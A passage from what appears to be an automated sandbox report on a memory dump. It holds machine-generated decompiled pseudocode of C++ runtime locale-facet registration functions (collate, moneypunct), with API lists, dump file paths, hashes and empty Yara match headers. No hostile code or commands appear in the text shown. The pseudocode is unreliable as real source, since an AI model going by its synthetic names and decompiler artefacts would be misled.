																																					if(_t892 != 0) {
																																						L82:
																																						E6D4866BA(_t946 - 0x14);
																																						return E6D4A0075(_t892);
																																					} else {
																																						__eflags = _t914;
																																						if(_t914 == 0) {
																																							_push( *((intOrPtr*)(_t946 + 8)));
																																							_push(_t946 - 0x10);
																																							__eflags = E6D491230(_t668, _t748, _t879, _t892, _t914) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D461438(_t946 - 0x20);
																																								E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																								asm("int3");
																																								E6D4A00AC(0x6d4e83cf, _t668, _t892, _t914, 0x14);
																																								E6D486653(_t946 - 0x14, 0);
																																								_t915 =  *0x6d546dc4; // 0x0
																																								 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																								 *(_t946 - 0x10) = _t915;
																																								_t463 = E6D46161C(0x6d546d78);
																																								_t755 =  *((intOrPtr*)(_t946 + 8));
																																								_t893 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t463);
																																								__eflags = _t893;
																																								if(_t893 != 0) {
																																									L89:
																																									E6D4866BA(_t946 - 0x14);
																																									return E6D4A0075(_t893);
																																								} else {
																																									__eflags = _t915;
																																									if(_t915 == 0) {
																																										_push( *((intOrPtr*)(_t946 + 8)));
																																										_push(_t946 - 0x10);
																																										__eflags = E6D4912B4(_t668, _t755, _t879, _t893, _t915) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6D461438(_t946 - 0x20);
																																											E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																											asm("int3");
																																											E6D4A00AC(0x6d4e83cf, _t668, _t893, _t915, 0x14);
																																											E6D486653(_t946 - 0x14, 0);
																																											_t916 =  *0x6d546dd8; // 0x0
																																											 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																											 *(_t946 - 0x10) = _t916;
																																											_t476 = E6D46161C(0x6d546d84);
																																											_t762 =  *((intOrPtr*)(_t946 + 8));
																																											_t894 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t476);
																																											__eflags = _t894;
																																											if(_t894 != 0) {
																																												L96:
																																												E6D4866BA(_t946 - 0x14);
																																												return E6D4A0075(_t894);
																																											} else {
																																												__eflags = _t916;
																																												if(_t916 == 0) {
																																													_push( *((intOrPtr*)(_t946 + 8)));
																																													_push(_t946 - 0x10);
																																													__eflags = E6D491339(_t668, _t762, _t879, _t894, _t916) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6D461438(_t946 - 0x20);
																																														E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																														asm("int3");
																																														E6D4A00AC(0x6d4e83cf, _t668, _t894, _t916, 0x14);
																																														E6D486653(_t946 - 0x14, 0);
																																														_t917 =  *0x6d546db0; // 0x0
																																														 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																														 *(_t946 - 0x10) = _t917;
																																														_t489 = E6D46161C(0x6d546d64);
																																														_t769 =  *((intOrPtr*)(_t946 + 8));
																																														_t895 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t489);
																																														__eflags = _t895;
																																														if(_t895 != 0) {
																																															L103:
																																															E6D4866BA(_t946 - 0x14);
																																															return E6D4A0075(_t895);
																																														} else {
																																															__eflags = _t917;
																																															if(_t917 == 0) {
																																																_push( *((intOrPtr*)(_t946 + 8)));
																																																_push(_t946 - 0x10);
																																																__eflags = E6D4913A1(_t668, _t769, _t879, _t895, _t917) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6D461438(_t946 - 0x20);
																																																	E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																																	asm("int3");
																																																	E6D4A00AC(0x6d4e83cf, _t668, _t895, _t917, 0x14);
																																																	E6D486653(_t946 - 0x14, 0);
																																																	_t918 =  *0x6d546ddc; // 0x0
																																																	 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																	 *(_t946 - 0x10) = _t918;
																																																	_t502 = E6D46161C(0x6d546d88);
																																																	_t776 =  *((intOrPtr*)(_t946 + 8));
																																																	_t896 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t502);
																																																	__eflags = _t896;
																																																	if(_t896 != 0) {
																																																		L110:
																																																		E6D4866BA(_t946 - 0x14);
																																																		return E6D4A0075(_t896);
																																																	} else {
																																																		__eflags = _t918;
																																																		if(_t918 == 0) {
																																																			_push( *((intOrPtr*)(_t946 + 8)));
																																																			_push(_t946 - 0x10);
																																																			__eflags = E6D491409(_t668, _t776, _t879, _t896, _t918) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6D461438(_t946 - 0x20);
																																																				E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																																				asm("int3");
																																																				E6D4A00AC(0x6d4e83cf, _t668, _t896, _t918, 0x14);
																																																				E6D486653(_t946 - 0x14, 0);
																																																				_t919 =  *0x6d546de0; // 0x0
																																																				 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																				 *(_t946 - 0x10) = _t919;
																																																				_t515 = E6D46161C(0x6d546d8c);
																																																				_t783 =  *((intOrPtr*)(_t946 + 8));
																																																				_t897 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t515);
																																																				__eflags = _t897;
																																																				if(_t897 != 0) {
																																																					L117:
																																																					E6D4866BA(_t946 - 0x14);
																																																					return E6D4A0075(_t897);
																																																				} else {
																																																					__eflags = _t919;
																																																					if(_t919 == 0) {
																																																						_push( *((intOrPtr*)(_t946 + 8)));
																																																						_push(_t946 - 0x10);
																																																						__eflags = E6D491471(_t668, _t783, _t879, _t897, _t919) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6D461438(_t946 - 0x20);
																																																							E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																																							asm("int3");
																																																							E6D4A00AC(0x6d4e83cf, _t668, _t897, _t919, 0x14);
																																																							E6D486653(_t946 - 0x14, 0);
																																																							_t920 =  *0x6d546dfc; // 0x0
																																																							 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																							 *(_t946 - 0x10) = _t920;
																																																							_t528 = E6D46161C(0x6d546da8);
																																																							_t790 =  *((intOrPtr*)(_t946 + 8));
																																																							_t898 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t528);
																																																							__eflags = _t898;
																																																							if(_t898 != 0) {
																																																								L124:
																																																								E6D4866BA(_t946 - 0x14);
																																																								return E6D4A0075(_t898);
																																																							} else {
																																																								__eflags = _t920;
																																																								if(_t920 == 0) {
																																																									_push( *((intOrPtr*)(_t946 + 8)));
																																																									_push(_t946 - 0x10);
																																																									__eflags = E6D4914EC(_t668, _t790, _t879, _t898, _t920) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6D461438(_t946 - 0x20);
																																																										E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																																										asm("int3");
																																																										E6D4A00AC(0x6d4e83cf, _t668, _t898, _t920, 0x14);
																																																										E6D486653(_t946 - 0x14, 0);
																																																										_t921 =  *0x6d546dcc; // 0x0
																																																										 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																										 *(_t946 - 0x10) = _t921;
																																																										_t541 = E6D46161C(0x6d546d80);
																																																										_t797 =  *((intOrPtr*)(_t946 + 8));
																																																										_t899 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t541);
																																																										__eflags = _t899;
																																																										if(_t899 != 0) {
																																																											L131:
																																																											E6D4866BA(_t946 - 0x14);
																																																											return E6D4A0075(_t899);
																																																										} else {
																																																											__eflags = _t921;
																																																											if(_t921 == 0) {
																																																												_push( *((intOrPtr*)(_t946 + 8)));
																																																												_push(_t946 - 0x10);
																																																												__eflags = E6D491558(_t668, _t797, _t879, _t899, _t921) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6D461438(_t946 - 0x20);
																																																													E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																																													asm("int3");
																																																													E6D4A00AC(0x6d4e83cf, _t668, _t899, _t921, 0x14);
																																																													E6D486653(_t946 - 0x14, 0);
																																																													_t922 =  *0x6d546e00; // 0x0
																																																													 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																													 *(_t946 - 0x10) = _t922;
																																																													_t554 = E6D46161C(0x6d546dac);
																																																													_t804 =  *((intOrPtr*)(_t946 + 8));
																																																													_t900 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t554);
																																																													__eflags = _t900;
																																																													if(_t900 != 0) {
																																																														L138:
																																																														E6D4866BA(_t946 - 0x14);
																																																														return E6D4A0075(_t900);
																																																													} else {
																																																														__eflags = _t922;
																																																														if(_t922 == 0) {
																																																															_push( *((intOrPtr*)(_t946 + 8)));
																																																															_push(_t946 - 0x10);
																																																															__eflags = E6D4915C4(_t668, _t804, _t879, _t900, _t922) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																E6D461438(_t946 - 0x20);
																																																																E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																																																asm("int3");
																																																																E6D4A00AC(0x6d4e83cf, _t668, _t900, _t922, 0x14);
																																																																E6D486653(_t946 - 0x14, 0);
																																																																_t923 =  *0x6d546dd0; // 0x0
																																																																 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																																 *(_t946 - 0x10) = _t923;
																																																																_t567 = E6D46161C(0x6d546d60);
																																																																_t811 =  *((intOrPtr*)(_t946 + 8));
																																																																_t901 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t567);
																																																																__eflags = _t901;
																																																																if(_t901 != 0) {
																																																																	L145:
																																																																	E6D4866BA(_t946 - 0x14);
																																																																	return E6D4A0075(_t901);
																																																																} else {
																																																																	__eflags = _t923;
																																																																	if(_t923 == 0) {
																																																																		_push( *((intOrPtr*)(_t946 + 8)));
																																																																		_push(_t946 - 0x10);
																																																																		__eflags = E6D49162A(_t668, _t811, _t879, _t901, _t923) - 0xffffffff;
																																																																		if(__eflags == 0) {
																																																																			_t815 = _t946 - 0x20;
																																																																			E6D461438(_t815);
																																																																			E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																																																			asm("int3");
																																																																			E6D4A00AC(0x6d4e851f, _t668, _t901, _t923, 4);
																																																																			_t924 = _t815;
																																																																			 *(_t946 - 0x10) = _t924;
																																																																			 *((intOrPtr*)(_t924 + 4)) =  *((intOrPtr*)(_t946 + 0xc));
																																																																			_push( *((intOrPtr*)(_t946 + 0x14)));
																																																																			_t301 = _t946 - 4;
																																																																			 *_t301 =  *(_t946 - 4) & 0x00000000;
																																																																			__eflags =  *_t301;
																																																																			 *_t924 = 0x6d4ec0c4;
																																																																			 *((char*)(_t924 + 0x28)) =  *((intOrPtr*)(_t946 + 0x10));
																																																																			E6D49542F(_t668, _t815, _t879, _t901, _t924,  *_t301);
																																																																			return E6D4A0075(_t924,  *((intOrPtr*)(_t946 + 8)));
																																																																		} else {
																																																																			_t901 =  *(_t946 - 0x10);
																																																																			 *(_t946 - 0x10) = _t901;
																																																																			 *(_t946 - 4) = 1;
																																																																			E6D486FD3(__eflags, _t901);
																																																																			 *0x6d4ea26c();
																																																																			 *((intOrPtr*)( *((intOrPtr*)( *_t901 + 4))))();
																																																																			 *0x6d546dd0 = _t901;
																																																																			goto L145;
																																																																		}
																																																																	} else {
																																																																		_t901 = _t923;
																																																																		goto L145;
																																																																	}
																																																																}
																																																															} else {
																																																																_t900 =  *(_t946 - 0x10);
																																																																 *(_t946 - 0x10) = _t900;
																																																																 *(_t946 - 4) = 1;
																																																																E6D486FD3(__eflags, _t900);
																																																																 *0x6d4ea26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t900 + 4))))();
																																																																 *0x6d546e00 = _t900;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t900 = _t922;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t899 =  *(_t946 - 0x10);
																																																													 *(_t946 - 0x10) = _t899;
																																																													 *(_t946 - 4) = 1;
																																																													E6D486FD3(__eflags, _t899);
																																																													 *0x6d4ea26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t899 + 4))))();
																																																													 *0x6d546dcc = _t899;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t899 = _t921;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t898 =  *(_t946 - 0x10);
																																																										 *(_t946 - 0x10) = _t898;
																																																										 *(_t946 - 4) = 1;
																																																										E6D486FD3(__eflags, _t898);
																																																										 *0x6d4ea26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t898 + 4))))();
																																																										 *0x6d546dfc = _t898;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t898 = _t920;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t897 =  *(_t946 - 0x10);
																																																							 *(_t946 - 0x10) = _t897;
																																																							 *(_t946 - 4) = 1;
																																																							E6D486FD3(__eflags, _t897);
																																																							 *0x6d4ea26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t897 + 4))))();
																																																							 *0x6d546de0 = _t897;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t897 = _t919;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t896 =  *(_t946 - 0x10);
																																																				 *(_t946 - 0x10) = _t896;
																																																				 *(_t946 - 4) = 1;
																																																				E6D486FD3(__eflags, _t896);
																																																				 *0x6d4ea26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t896 + 4))))();
																																																				 *0x6d546ddc = _t896;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t896 = _t918;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t895 =  *(_t946 - 0x10);
																																																	 *(_t946 - 0x10) = _t895;
																																																	 *(_t946 - 4) = 1;
																																																	E6D486FD3(__eflags, _t895);
																																																	 *0x6d4ea26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t895 + 4))))();
																																																	 *0x6d546db0 = _t895;
																																																	goto L103;
																																																}
																																															} else {
																																																_t895 = _t917;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t894 =  *(_t946 - 0x10);
																																														 *(_t946 - 0x10) = _t894;
																																														 *(_t946 - 4) = 1;
																																														E6D486FD3(__eflags, _t894);
																																														 *0x6d4ea26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t894 + 4))))();
																																														 *0x6d546dd8 = _t894;
																																														goto L96;
																																													}
																																												} else {
																																													_t894 = _t916;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t893 =  *(_t946 - 0x10);
																																											 *(_t946 - 0x10) = _t893;
																																											 *(_t946 - 4) = 1;
																																											E6D486FD3(__eflags, _t893);
																																											 *0x6d4ea26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t893 + 4))))();
																																											 *0x6d546dc4 = _t893;
																																											goto L89;
																																										}
																																									} else {
																																										_t893 = _t915;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t892 =  *(_t946 - 0x10);
																																								 *(_t946 - 0x10) = _t892;
																																								 *(_t946 - 4) = 1;
																																								E6D486FD3(__eflags, _t892);
																																								 *0x6d4ea26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t892 + 4))))();
																																								 *0x6d546dc8 = _t892;
																																								goto L82;
																																							}
																																						} else {
																																							_t892 = _t914;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t891 =  *(_t946 - 0x10);
																																					 *(_t946 - 0x10) = _t891;
																																					 *(_t946 - 4) = 1;
																																					E6D486FD3(__eflags, _t891);
																																					 *0x6d4ea26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t891 + 4))))();
																																					 *0x6d546df4 = _t891;
																																					goto L75;
																																				}
																																			} else {
																																				_t891 = _t913;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t890 =  *(_t946 - 0x10);
																																		 *(_t946 - 0x10) = _t890;
																																		 *(_t946 - 4) = 1;
																																		E6D486FD3(__eflags, _t890);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t890 + 4))))();
																																		 *0x6d546df8 = _t890;
																																		goto L68;
																																	}
																																} else {
																																	_t890 = _t912;
																																	goto L68;
																																}
																															}
																														} else {
																															_t889 =  *(_t946 - 0x10);
																															 *(_t946 - 0x10) = _t889;
																															 *(_t946 - 4) = 1;
																															E6D486FD3(__eflags, _t889);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t889 + 4))))();
																															 *0x6d546dc0 = _t889;
																															goto L61;
																														}
																													} else {
																														_t889 = _t911;
																														goto L61;
																													}
																												}
																											} else {
																												_t888 =  *(_t946 - 0x10);
																												 *(_t946 - 0x10) = _t888;
																												 *(_t946 - 4) = 1;
																												E6D486FD3(__eflags, _t888);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t888 + 4))))();
																												 *0x6d546df0 = _t888;
																												goto L54;
																											}
																										} else {
																											_t888 = _t910;
																											goto L54;
																										}
																									}
																								} else {
																									_t887 =  *(_t946 - 0x10);
																									 *(_t946 - 0x10) = _t887;
																									 *(_t946 - 4) = 1;
																									E6D486FD3(__eflags, _t887);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t887 + 4))))();
																									 *0x6d546dbc = _t887;
																									goto L47;
																								}
																							} else {
																								_t887 = _t909;
																								goto L47;
																							}
																						}
																					} else {
																						_t886 =  *(_t946 - 0x10);
																						 *(_t946 - 0x10) = _t886;
																						 *(_t946 - 4) = 1;
																						E6D486FD3(__eflags, _t886);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t886 + 4))))();
																						 *0x6d546dec = _t886;
																						goto L40;
																					}
																				} else {
																					_t886 = _t908;
																					goto L40;
																				}
																			}
																		} else {
																			_t885 =  *(_t946 - 0x10);
																			 *(_t946 - 0x10) = _t885;
																			 *(_t946 - 4) = 1;
																			E6D486FD3(__eflags, _t885);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t885 + 4))))();
																			 *0x6d546db8 = _t885;
																			goto L33;
																		}
																	} else {
																		_t885 = _t907;
																		goto L33;
																	}
																}
															} else {
																_t884 =  *(_t946 - 0x10);
																 *(_t946 - 0x10) = _t884;
																 *(_t946 - 4) = 1;
																E6D486FD3(__eflags, _t884);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t884 + 4))))();
																 *0x6d546de8 = _t884;
																goto L26;
															}
														} else {
															_t884 = _t906;
															goto L26;
														}
													}
												} else {
													_t883 =  *(_t946 - 0x10);
													 *(_t946 - 0x10) = _t883;
													 *(_t946 - 4) = 1;
													E6D486FD3(__eflags, _t883);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t883 + 4))))();
													 *0x6d546dd4 = _t883;
													goto L19;
												}
											} else {
												_t883 = _t905;
												goto L19;
											}
										}
									} else {
										_t882 =  *(_t946 - 0x10);
										 *(_t946 - 0x10) = _t882;
										 *(_t946 - 4) = 1;
										E6D486FD3(__eflags, _t882);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t882 + 4))))();
										 *0x6d546db4 = _t882;
										goto L12;
									}
								} else {
									_t882 = _t904;
									goto L12;
								}
							}
						} else {
							_t881 =  *(_t946 - 0x10);
							 *(_t946 - 0x10) = _t881;
							 *(_t946 - 4) = 1;
							E6D486FD3(__eflags, _t881);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t881 + 4))))();
							 *0x6d546de4 = _t881;
							goto L5;
						}
					} else {
						_t881 = _t903;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48EF98
std::_Lockit::_Lockit.LIBCPMT ref: 6D48EFA2
int.LIBCPMT ref: 6D48EFB9

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

collate.LIBCPMT ref: 6D48EFDC
std::_Facet_Register.LIBCPMT ref: 6D48EFF3
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F013
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F031

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: 5238d6706fac9896d247a962540e0513fb4f08c89e7baf620fcced5b482ae0b1
Instruction ID: 962aaaca851c3c92ee19a1521c6c4b9e8e38070c3b2c670cc84ad9c8db6a5dd7
Opcode Fuzzy Hash: 5238d6706fac9896d247a962540e0513fb4f08c89e7baf620fcced5b482ae0b1
Instruction Fuzzy Hash: D011E0758082599BCF05EBA0C840FEDB774AF94314F2A440DE611BB392DB70EE0087E2

Uniqueness

Uniqueness Score: -1.00%

Function 6D49B9E4, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D49B9E4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;

				_t182 = __edx;
				_t141 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t198 - 0x14, 0);
				_t189 =  *0x6d546e3c; // 0x0
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6D46161C(0x6d546e1c);
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6D46171B( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6D4866BA(_t198 - 0x14);
					return E6D4A0075(_t184);
				} else {
					if(_t189 == 0) {
						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6D49C120(__ebx, _t144, __edx, _t184, _t189) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t198 - 0x20);
							E6D4A3D74(_t198 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t184, _t189, 0x14);
							E6D486653(_t198 - 0x14, 0);
							_t190 =  *0x6d546e38; // 0x0
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6D46161C(0x6d546e18);
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6D46171B( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6D4866BA(_t198 - 0x14);
								return E6D4A0075(_t185);
							} else {
								__eflags = _t190;
								if(_t190 == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6D49C1A4(_t141, _t151, __edx, _t185, _t190) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t198 - 0x20);
										E6D4A3D74(_t198 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t141, _t185, _t190, 0x14);
										E6D486653(_t198 - 0x14, 0);
										_t191 =  *0x6d546e40; // 0x0
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6D46161C(0x6d546e20);
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6D46171B( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6D4866BA(_t198 - 0x14);
											return E6D4A0075(_t186);
										} else {
											__eflags = _t191;
											if(_t191 == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6D49C229(_t141, _t158, __edx, _t186, _t191) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t198 - 0x20);
													E6D4A3D74(_t198 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t141, _t186, _t191, 0x14);
													E6D486653(_t198 - 0x14, 0);
													_t192 =  *0x6d546e44; // 0x0
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6D46161C(0x6d546e24);
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6D46171B( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6D4866BA(_t198 - 0x14);
														return E6D4A0075(_t187);
													} else {
														__eflags = _t192;
														if(_t192 == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6D49C295(_t141, _t165, _t182, _t187, _t192) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6D461438(_t169);
																E6D4A3D74(_t198 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e851f, _t141, _t187, _t192, 4);
																_t193 = _t169;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6d4ec414;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6D49D028(_t141, _t169, _t182, _t187, _t193,  *_t63);
																return E6D4A0075(_t193,  *((intOrPtr*)(_t198 + 8)));
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6D486FD3(__eflags, _t187);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6d546e44 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6D486FD3(__eflags, _t186);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6d546e40 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6D486FD3(__eflags, _t185);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6d546e38 = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6D486FD3(__eflags, _t184);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6d546e3c = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D49B9EB
std::_Lockit::_Lockit.LIBCPMT ref: 6D49B9F5
int.LIBCPMT ref: 6D49BA0C

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

moneypunct.LIBCPMT ref: 6D49BA2F
std::_Facet_Register.LIBCPMT ref: 6D49BA46
std::_Lockit::~_Lockit.LIBCPMT ref: 6D49BA66
__CxxThrowException@8.LIBVCRUNTIME ref: 6D49BA84

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: bd8ec345e13c7a613dec032676fc6653c1fff697fcc4f5244f5034d9a88a75bf
Instruction ID: 16f829e6b6cee439fcc54bbd456746baf894cbef50d2ef0b633ef41033b55326
Opcode Fuzzy Hash: bd8ec345e13c7a613dec032676fc6653c1fff697fcc4f5244f5034d9a88a75bf
Instruction Fuzzy Hash: 7011C175808119DBCF00EB65C880FEEBBB4AF94314F1A400CD611AB290CB74DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F9F1, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D48F9F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
